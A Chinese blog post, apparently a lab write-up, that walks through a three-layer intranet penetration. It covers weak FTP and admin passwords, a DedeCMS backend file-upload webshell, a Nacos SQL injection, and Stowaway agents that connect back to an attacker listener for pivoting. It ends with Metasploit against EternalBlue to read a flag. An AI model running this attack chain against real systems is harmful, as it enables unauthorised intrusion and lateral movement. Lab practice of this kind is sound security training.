
在这个时代,我认为AI完全能梭哈了,但是我自己体验下来,觉得现在的AI在打一些漏洞的时候没有手工打的快,而且我也不想为了靶场给AI充钱,所以这里的操作还是半自动化。因为现在很难完全脱离AI。
信息收集
依旧是我管他这那的,先扫两梭子


捋一下,现在发现了FTP弱口令,和一个cve,这个cve可以爆出路径,有路径了,是不是可以找一下源码

好家伙,ftp进来之后连路径都不用找,直接拿到源码

web打点
有源码了,可以代码审计,也可以去搜dedecms的nday,这里有个文件上传漏洞,我是代码审计拿到的,具体不多说,但是是后台的。那么如何找到后台呢,也是可以代码审计或者直接目录扫描
1 | http://192.168.111.20:8080/dede/login.php |
问题是怎么进后台?这里只能弱口令了,爆破一下,运气比较好,直接admin/admin就进来了

漏洞点非常明显,就在后台的文件管理器这里,这里不仅可以上传新的文件,而且可以修改文件,任意格式都可以上传,这里上传了shell.php也是成功执行了

内网信息收集
这里应该是没什么杀软,我就传的最垃圾的webshell也没被杀,直接先ipconfig看看网段吧

这里拿到了内网IP地址:192.168.52.2,这个伪终端太难受了,上个vshell吧

上个pscan,我管他这那的,先扫一梭子
1 | pscan.exe -t 192.168.52.2/24 |

扫到一个内网web,看看能不能打,上个代理,我这里用suo5
内网横向
1 | 192.168.52.4:80 |

直接suo5链接,然后proxifier直接any即可,然后很明显是nacos,直接拿nday打一下试试,这里运气也是比较好,存在SQL注入

直接连冰蝎


这里其实还能找到一个密码,上边我们扫描端口的时候扫到了一个redis,我们尝试登录一下

成功登录
二层代理
上边拿到了新的一台Linux的shell,这台机器机器也是双网卡,又引出来一个新的段37段,这里挂上扫描器,然后需要配置二层代理,这里我选用了Stowaway

扫到了一个永恒之蓝,开始挂代理,现在我们的攻击机监听一下
1 | ./stowaway_admin -l 9999 |
然后先到第一层代理,也就是Windows那台
1 | windows_x64_agent.exe -c 192.168.111.25:9999 |

OK,成功挂上了,现在开始在这台监听
1 | 依次输入 |
然后我们还需要去Linux上执行一下命令,所以这里还需要先挂上代理执行一下
1 | socks 1111 |

1 | ./linux_x64_agent -c 192.168.52.2:9998 |

OK,应该是挂上了,然后socks挂到二层代理。
1 | back |
然后msf启动!
1 | proxychains4 msfconsole |
OK,拿到shell了,直接读取flag
1 | meterpreter > dir C:\\Users |

- Post title: 州弟学安全:三层综合渗透
- Create time: 2026-08-22 18:13:29
- Post link: 2026/08/22/州弟学安全:三层综合渗透_/
- Copyright notice: All articles in this blog are licensed under BY-NC-SA unless stating additionally.